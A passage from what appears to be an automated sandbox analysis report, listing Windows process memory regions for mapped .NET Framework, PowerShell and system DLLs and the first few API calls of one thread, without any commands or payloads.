	        filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")

Region:
	              id = 2026
	        start_va = 0x2ad3ba40000
	          end_va = 0x2ad3ba93fff
	     entry_point = 0x2ad3ba40000
	     region_type = mapped_file
	            name = "mscorrc.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll")

Region:
	              id = 2027
	        start_va = 0x7ffb961d0000
	          end_va = 0x7ffb961dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb961d0000"
	        filename = ""

Region:
	              id = 2028
	        start_va = 0x7ffb961e0000
	          end_va = 0x7ffb961effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb961e0000"
	        filename = ""

Region:
	              id = 2029
	        start_va = 0x7ffb961f0000
	          end_va = 0x7ffb961fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb961f0000"
	        filename = ""

Region:
	              id = 2030
	        start_va = 0x7ffb96200000
	          end_va = 0x7ffb9620ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96200000"
	        filename = ""

Region:
	              id = 2031
	        start_va = 0x7ffb96210000
	          end_va = 0x7ffb9621ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96210000"
	        filename = ""

Region:
	              id = 2032
	        start_va = 0x7ffb96220000
	          end_va = 0x7ffb9622ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96220000"
	        filename = ""

Region:
	              id = 2033
	        start_va = 0x7ffb96230000
	          end_va = 0x7ffb9623ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96230000"
	        filename = ""

Region:
	              id = 2034
	        start_va = 0x7ffb96240000
	          end_va = 0x7ffb9624ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96240000"
	        filename = ""

Region:
	              id = 2035
	        start_va = 0x7ffb96250000
	          end_va = 0x7ffb9625ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96250000"
	        filename = ""

Region:
	              id = 2036
	        start_va = 0x7ffb96260000
	          end_va = 0x7ffb9626ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96260000"
	        filename = ""

Region:
	              id = 2037
	        start_va = 0x7ffbf1bd0000
	          end_va = 0x7ffbf2428fff
	     entry_point = 0x7ffbf1bd0000
	     region_type = mapped_file
	            name = "system.data.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\6d7e9346540b54a87f6dc9d2c1e41fde\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\6d7e9346540b54a87f6dc9d2c1e41fde\\system.data.ni.dll")

Region:
	              id = 2038
	        start_va = 0x7ffbf27e0000
	          end_va = 0x7ffbf2973fff
	     entry_point = 0x7ffbf27e0000
	     region_type = mapped_file
	            name = "system.directoryservices.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c9e715b348d50a8d998941274163be87\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c9e715b348d50a8d998941274163be87\\system.directoryservices.ni.dll")

Region:
	              id = 2039
	        start_va = 0x7ffbf2980000
	          end_va = 0x7ffbf2aebfff
	     entry_point = 0x7ffbf2980000
	     region_type = mapped_file
	            name = "system.management.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\0a275683c96e1bb1b30d0be9e7176315\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\0a275683c96e1bb1b30d0be9e7176315\\system.management.ni.dll")

Region:
	              id = 2040
	        start_va = 0x7ffb96270000
	          end_va = 0x7ffb9627ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96270000"
	        filename = ""

Region:
	              id = 2041
	        start_va = 0x7ffb96280000
	          end_va = 0x7ffb9628ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96280000"
	        filename = ""

Region:
	              id = 2042
	        start_va = 0x7ffb96290000
	          end_va = 0x7ffb9629ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96290000"
	        filename = ""

Region:
	              id = 2043
	        start_va = 0x7ffb962a0000
	          end_va = 0x7ffb962affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962a0000"
	        filename = ""

Region:
	              id = 2044
	        start_va = 0x2ad23210000
	          end_va = 0x2ad23214fff
	     entry_point = 0x2ad23210000
	     region_type = mapped_file
	            name = "winnlsres.dll"
	        filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")

Region:
	              id = 2045
	        start_va = 0x2ad23220000
	          end_va = 0x2ad2322ffff
	     entry_point = 0x2ad23220000
	     region_type = mapped_file
	            name = "winnlsres.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")

Region:
	              id = 2046
	        start_va = 0x5cc80000
	          end_va = 0x5ccc8fff
	     entry_point = 0x5cc80000
	     region_type = mapped_file
	            name = "system.transactions.dll"
	        filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll")

Region:
	              id = 2047
	        start_va = 0x2ad23240000
	          end_va = 0x2ad23240fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad23240000"
	        filename = ""

Region:
	              id = 2048
	        start_va = 0x7ffbf1650000
	          end_va = 0x7ffbf1734fff
	     entry_point = 0x7ffbf1650000
	     region_type = mapped_file
	            name = "system.transactions.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\1a0039f0915836d939d771d7abc21893\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\1a0039f0915836d939d771d7abc21893\\system.transactions.ni.dll")

Region:
	              id = 2049
	        start_va = 0x7ffbf1740000
	          end_va = 0x7ffbf17e8fff
	     entry_point = 0x7ffbf1740000
	     region_type = mapped_file
	            name = "microsoft.wsman.management.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\5a3b55817db1f9d796b9b41c9ab92853\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\5a3b55817db1f9d796b9b41c9ab92853\\microsoft.wsman.management.ni.dll")

Region:
	              id = 2050
	        start_va = 0x7ffbf17f0000
	          end_va = 0x7ffbf1822fff
	     entry_point = 0x7ffbf17f0000
	     region_type = mapped_file
	            name = "system.configuration.install.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\e48b746caae6f9959e8f0bcd6a0bd5b2\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\e48b746caae6f9959e8f0bcd6a0bd5b2\\system.configuration.install.ni.dll")

Region:
	              id = 2051
	        start_va = 0x7ffbf1830000
	          end_va = 0x7ffbf1898fff
	     entry_point = 0x7ffbf1830000
	     region_type = mapped_file
	            name = "microsoft.powershell.commands.diagnostics.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\bb0e04744a248fac351d492d487895da\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\bb0e04744a248fac351d492d487895da\\microsoft.powershell.commands.diagnostics.ni.dll")

Region:
	              id = 2052
	        start_va = 0x7ffbf18a0000
	          end_va = 0x7ffbf1bcffff
	     entry_point = 0x7ffbf18a0000
	     region_type = mapped_file
	            name = "system.core.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\6bb5037e396ab8fd052e7b3a2c1a9c84\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\6bb5037e396ab8fd052e7b3a2c1a9c84\\system.core.ni.dll")

Region:
	              id = 2053
	        start_va = 0x2ad3baa0000
	          end_va = 0x2ad3bc9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3baa0000"
	        filename = ""

Region:
	              id = 2054
	        start_va = 0x7ffbf11b0000
	          end_va = 0x7ffbf11b6fff
	     entry_point = 0x7ffbf11b0000
	     region_type = mapped_file
	            name = "shfolder.dll"
	        filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll")

Region:
	              id = 2055
	        start_va = 0x7ffbf11c0000
	          end_va = 0x7ffbf11fdfff
	     entry_point = 0x7ffbf11c0000
	     region_type = mapped_file
	            name = "microsoft.powershell.security.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\40c9953e749f0757ce67ecbdfe12f613\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\40c9953e749f0757ce67ecbdfe12f613\\microsoft.powershell.security.ni.dll")

Region:
	              id = 2056
	        start_va = 0x7ffbf1200000
	          end_va = 0x7ffbf124bfff
	     entry_point = 0x7ffbf1200000
	     region_type = mapped_file
	            name = "system.serviceprocess.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.ServiceProce#\\4e4b553cb8528abca787c6e0821e2a0f\\System.ServiceProcess.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.serviceproce#\\4e4b553cb8528abca787c6e0821e2a0f\\system.serviceprocess.ni.dll")

Region:
	              id = 2057
	        start_va = 0x7ffbf1250000
	          end_va = 0x7ffbf1367fff
	     entry_point = 0x7ffbf1250000
	     region_type = mapped_file
	            name = "microsoft.powershell.commands.management.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\e89252939b60e0b094732d516aabfb1f\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\e89252939b60e0b094732d516aabfb1f\\microsoft.powershell.commands.management.ni.dll")

Region:
	              id = 2058
	        start_va = 0x7ffbf1370000
	          end_va = 0x7ffbf1421fff
	     entry_point = 0x7ffbf1370000
	     region_type = mapped_file
	            name = "microsoft.powershell.consolehost.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\807cdbb97f8470d00364b0e411435df1\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\807cdbb97f8470d00364b0e411435df1\\microsoft.powershell.consolehost.ni.dll")

Region:
	              id = 2059
	        start_va = 0x7ffbf1430000
	          end_va = 0x7ffbf1645fff
	     entry_point = 0x7ffbf1430000
	     region_type = mapped_file
	            name = "microsoft.powershell.commands.utility.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\59eeb33edb7dc0fa61bcbf137101bd4c\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\59eeb33edb7dc0fa61bcbf137101bd4c\\microsoft.powershell.commands.utility.ni.dll")

Region:
	              id = 2060
	        start_va = 0x7ffc07fd0000
	          end_va = 0x7ffc07fdbfff
	     entry_point = 0x7ffc07fd0000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")

Region:
	              id = 2061
	        start_va = 0xd7eed90000
	          end_va = 0xd7ef71ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7eed90000"
	        filename = ""

Region:
	              id = 2062
	        start_va = 0x2ad23160000
	          end_va = 0x2ad23170fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad23160000"
	        filename = ""

Region:
	              id = 2063
	        start_va = 0x2ad23180000
	          end_va = 0x2ad2318ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad23180000"
	        filename = ""

Region:
	              id = 2064
	        start_va = 0x2ad3bca0000
	          end_va = 0x2ad3bcaffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3bca0000"
	        filename = ""

Region:
	              id = 2065
	        start_va = 0x7ffb962b0000
	          end_va = 0x7ffb962bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962b0000"
	        filename = ""

Region:
	              id = 2066
	        start_va = 0x7ffb962c0000
	          end_va = 0x7ffb962cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962c0000"
	        filename = ""

Region:
	              id = 2067
	        start_va = 0x7ffb962d0000
	          end_va = 0x7ffb962dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962d0000"
	        filename = ""

Region:
	              id = 2068
	        start_va = 0x7ffb962e0000
	          end_va = 0x7ffb962effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962e0000"
	        filename = ""

Region:
	              id = 2069
	        start_va = 0x7ffbf6590000
	          end_va = 0x7ffbf66d6fff
	     entry_point = 0x7ffbf6590000
	     region_type = mapped_file
	            name = "system.configuration.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuration\\d150bbe1b49ee54e3c69b476754f88b9\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuration\\d150bbe1b49ee54e3c69b476754f88b9\\system.configuration.ni.dll")

Region:
	              id = 2070
	        start_va = 0x2ad3bcb0000
	          end_va = 0x2ad3bccffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad3bcb0000"
	        filename = ""

Region:
	              id = 2071
	        start_va = 0x7ffb962f0000
	          end_va = 0x7ffb962fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962f0000"
	        filename = ""

Region:
	              id = 2072
	        start_va = 0x7ffbf10f0000
	          end_va = 0x7ffbf11a9fff
	     entry_point = 0x7ffbf10f0000
	     region_type = mapped_file
	            name = "rasapi32.dll"
	        filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")

Region:
	              id = 2073
	        start_va = 0x7ffbf6940000
	          end_va = 0x7ffbf6967fff
	     entry_point = 0x7ffbf6940000
	     region_type = mapped_file
	            name = "rasman.dll"
	        filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")

Region:
	              id = 2074
	        start_va = 0x7ffc0cc10000
	          end_va = 0x7ffc0cc23fff
	     entry_point = 0x7ffc0cc10000
	     region_type = mapped_file
	            name = "rtutils.dll"
	        filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")

Region:
	              id = 2075
	        start_va = 0xd7ef720000
	          end_va = 0xd7ef79ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ef720000"
	        filename = ""

Region:
	              id = 2076
	        start_va = 0x7ffc0c510000
	          end_va = 0x7ffc0c525fff
	     entry_point = 0x7ffc0c510000
	     region_type = mapped_file
	            name = "dhcpcsvc6.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")

Region:
	              id = 2077
	        start_va = 0x7ffc0c4f0000
	          end_va = 0x7ffc0c509fff
	     entry_point = 0x7ffc0c4f0000
	     region_type = mapped_file
	            name = "dhcpcsvc.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")

Region:
	              id = 2078
	        start_va = 0xd7ef7a0000
	          end_va = 0xd7ef81ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ef7a0000"
	        filename = ""

Region:
	              id = 2079
	        start_va = 0x2ad3bcd0000
	          end_va = 0x2ad3bcd2fff
	     entry_point = 0x2ad3bcd0000
	     region_type = mapped_file
	            name = "security.dll"
	        filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll")

Region:
	              id = 2080
	        start_va = 0x7ffc12a20000
	          end_va = 0x7ffc12a43fff
	     entry_point = 0x7ffc12a20000
	     region_type = mapped_file
	            name = "gpapi.dll"
	        filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")

Region:
	              id = 2081
	        start_va = 0x2ad20d20000
	          end_va = 0x2ad20d2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d20000"
	        filename = ""

Region:
	              id = 2082
	        start_va = 0x2ad20d30000
	          end_va = 0x2ad20d3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d30000"
	        filename = ""

Region:
	              id = 2083
	        start_va = 0x2ad20d40000
	          end_va = 0x2ad20d4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d40000"
	        filename = ""

Region:
	              id = 2084
	        start_va = 0x2ad20d50000
	          end_va = 0x2ad20d5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d50000"
	        filename = ""

Region:
	              id = 2085
	        start_va = 0x7ffbf6920000
	          end_va = 0x7ffbf693efff
	     entry_point = 0x7ffbf6920000
	     region_type = mapped_file
	            name = "shfusion.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\shfusion.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\shfusion.dll")

Region:
	              id = 2086
	        start_va = 0x2ad20d60000
	          end_va = 0x2ad20d60fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20d60000"
	        filename = ""

Region:
	              id = 2087
	        start_va = 0x7ffbf76c0000
	          end_va = 0x7ffbf7769fff
	     entry_point = 0x7ffbf76c0000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll")

Region:
	              id = 2088
	        start_va = 0x2ad3bce0000
	          end_va = 0x2ad3be6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3bce0000"
	        filename = ""

Region:
	              id = 2089
	        start_va = 0x2ad23180000
	          end_va = 0x2ad23186fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad23180000"
	        filename = ""

Region:
	              id = 2090
	        start_va = 0x7ffbf6910000
	          end_va = 0x7ffbf6916fff
	     entry_point = 0x7ffbf6910000
	     region_type = mapped_file
	            name = "fusion.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\fusion.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\fusion.dll")

Region:
	              id = 2091
	        start_va = 0x2ad3bca0000
	          end_va = 0x2ad3bca0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad3bca0000"
	        filename = ""

Region:
	              id = 2092
	        start_va = 0x7ffbf6900000
	          end_va = 0x7ffbf6909fff
	     entry_point = 0x7ffbf6900000
	     region_type = mapped_file
	            name = "culture.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll")

Region:
	              id = 2093
	        start_va = 0x2ad3bce0000
	          end_va = 0x2ad3bce0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad3bce0000"
	        filename = ""

Region:
	              id = 2094
	        start_va = 0x2ad3be60000
	          end_va = 0x2ad3be6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3be60000"
	        filename = ""

Region:
	              id = 2095
	        start_va = 0x7ffbf6570000
	          end_va = 0x7ffbf6588fff
	     entry_point = 0x7ffbf6570000
	     region_type = mapped_file
	            name = "shfusres.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ShFusRes.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\shfusres.dll")

Region:
	              id = 2096
	        start_va = 0x2ad3bcf0000
	          end_va = 0x2ad3bcf0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad3bcf0000"
	        filename = ""

Region:
	              id = 2097
	        start_va = 0x2ad3bd00000
	          end_va = 0x2ad3bd00fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3bd00000"
	        filename = ""

Region:
	              id = 2098
	        start_va = 0x2ad3bd60000
	          end_va = 0x2ad3bda3fff
	     entry_point = 0x2ad3bd60000
	     region_type = mapped_file
	            name = "system.security.dll"
	        filename = "\\Windows\\assembly\\GAC_MSIL\\System.Security\\2.0.0.0__b03f5f7f11d50a3a\\System.Security.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.security\\2.0.0.0__b03f5f7f11d50a3a\\system.security.dll")

Region:
	              id = 2099
	        start_va = 0x7ffb96300000
	          end_va = 0x7ffb9630ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96300000"
	        filename = ""

Region:
	              id = 2100
	        start_va = 0x2ad3bd10000
	          end_va = 0x2ad3bd53fff
	     entry_point = 0x2ad3bd10000
	     region_type = mapped_file
	            name = "system.security.dll"
	        filename = "\\Windows\\assembly\\GAC_MSIL\\System.Security\\2.0.0.0__b03f5f7f11d50a3a\\System.Security.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.security\\2.0.0.0__b03f5f7f11d50a3a\\system.security.dll")

Region:
	              id = 2101
	        start_va = 0x7ffb96310000
	          end_va = 0x7ffb9631ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96310000"
	        filename = ""

Region:
	              id = 2102
	        start_va = 0x2ad3bdb0000
	          end_va = 0x2ad3bdbffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3bdb0000"
	        filename = ""

Region:
	              id = 2103
	        start_va = 0x7ffbf68f0000
	          end_va = 0x7ffbf68fcfff
	     entry_point = 0x7ffbf68f0000
	     region_type = mapped_file
	            name = "wminet_utils.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\wminet_utils.dll")

Region:
	              id = 2104
	        start_va = 0x2ad3bdc0000
	          end_va = 0x2ad3bdc0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad3bdc0000"
	        filename = ""

Region:
	              id = 2105
	        start_va = 0x2ad3bdd0000
	          end_va = 0x2ad3bdd6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3bdd0000"
	        filename = ""

Region:
	              id = 2106
	        start_va = 0x2ad3bde0000
	          end_va = 0x2ad3bdeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3bde0000"
	        filename = ""

Region:
	              id = 2107
	        start_va = 0x2ad3bdf0000
	          end_va = 0x2ad3bdfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3bdf0000"
	        filename = ""

Region:
	              id = 2108
	        start_va = 0x2ad3be00000
	          end_va = 0x2ad3be0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3be00000"
	        filename = ""

Region:
	              id = 2109
	        start_va = 0x2ad3be10000
	          end_va = 0x2ad3be1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3be10000"
	        filename = ""

Region:
	              id = 2110
	        start_va = 0x2ad3bdf0000
	          end_va = 0x2ad3bdfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3bdf0000"
	        filename = ""

Region:
	              id = 2111
	        start_va = 0x7ffc06ac0000
	          end_va = 0x7ffc06ad5fff
	     entry_point = 0x7ffc06ac0000
	     region_type = mapped_file
	            name = "napinsp.dll"
	        filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")

Region:
	              id = 2112
	        start_va = 0x7ffc06ae0000
	          end_va = 0x7ffc06af9fff
	     entry_point = 0x7ffc06ae0000
	     region_type = mapped_file
	            name = "pnrpnsp.dll"
	        filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")

Region:
	              id = 2113
	        start_va = 0x7ffc0ff80000
	          end_va = 0x7ffc0ff97fff
	     entry_point = 0x7ffc0ff80000
	     region_type = mapped_file
	            name = "nlaapi.dll"
	        filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")

Region:
	              id = 2114
	        start_va = 0x7ffc06b00000
	          end_va = 0x7ffc06b0cfff
	     entry_point = 0x7ffc06b00000
	     region_type = mapped_file
	            name = "winrnr.dll"
	        filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")

Region:
	              id = 2115
	        start_va = 0xd7ef820000
	          end_va = 0xd7ef89ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ef820000"
	        filename = ""

Region:
	              id = 2116
	        start_va = 0x2ad20d20000
	          end_va = 0x2ad20d2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d20000"
	        filename = ""

Region:
	              id = 2117
	        start_va = 0x2ad20d30000
	          end_va = 0x2ad20d3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d30000"
	        filename = ""

Region:
	              id = 2118
	        start_va = 0x2ad20d40000
	          end_va = 0x2ad20d4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d40000"
	        filename = ""

Region:
	              id = 2119
	        start_va = 0x2ad20d50000
	          end_va = 0x2ad20d5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d50000"
	        filename = ""

Region:
	              id = 2120
	        start_va = 0x2ad20d30000
	          end_va = 0x2ad20d3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d30000"
	        filename = ""

Region:
	              id = 2121
	        start_va = 0x2ad20d40000
	          end_va = 0x2ad20d4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d40000"
	        filename = ""

Region:
	              id = 2122
	        start_va = 0x2ad20d50000
	          end_va = 0x2ad20d5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d50000"
	        filename = ""

Region:
	              id = 2123
	        start_va = 0x7ffb96320000
	          end_va = 0x7ffb9632ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96320000"
	        filename = ""

Region:
	              id = 2124
	        start_va = 0x2ad20d30000
	          end_va = 0x2ad20d3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d30000"
	        filename = ""

Region:
	              id = 2125
	        start_va = 0x2ad20d40000
	          end_va = 0x2ad20d4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d40000"
	        filename = ""

Region:
	              id = 2126
	        start_va = 0x2ad20d50000
	          end_va = 0x2ad20d5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d50000"
	        filename = ""

Region:
	              id = 2153
	        start_va = 0x2ad3bdb0000
	          end_va = 0x2ad3bdbffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad3bdb0000"
	        filename = ""


Thread:
	id = 187
	os_tid = 0x6bc

	[0110.825] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff66e670000
	[0110.825] __set_app_type (_Type=0x1) 
	[0110.825] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff66e6b1aa0) returned 0x0
	[0110.825] __wgetmainargs (in: _Argc=0x7ff66e6da258, _Argv=0x7ff66e6da260, _Env=0x7ff66e6da268, _DoWildCard=0, _StartInfo=0x7ff66e6da274 | out: _Argc=0x7ff66e6da258, _Argv=0x7ff66e6da260, _Env=0x7ff66e6da268) returned 0
	[0110.825] ??0CHString@@QEAA@XZ () returned 0x7ff66e6da9b0
	[0110.827] ??0CHString@@QEAA@XZ () returned 0x7ff66e6dae60
	[0110.828] ?Empty@CHString@@QEAAXXZ () returned 0x7ffbfe19627c
	[0110.828] SetConsoleCtrlHandler (HandlerRoutine=0x7ff66e6aa570, Add=1) returned 1
	[0110.828] _onexit (_Func=0x7ff66e6bcd20) returned 0x7ff66e6bcd20
	[0110.828] _onexit (_Func=0x7ff66e6bce30) returned 0x7ff66e6bce30
	[0110.828] _onexit (_Func=0x7ff66e6bce70) returned 0x7ff66e6bce70
	[0110.828] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
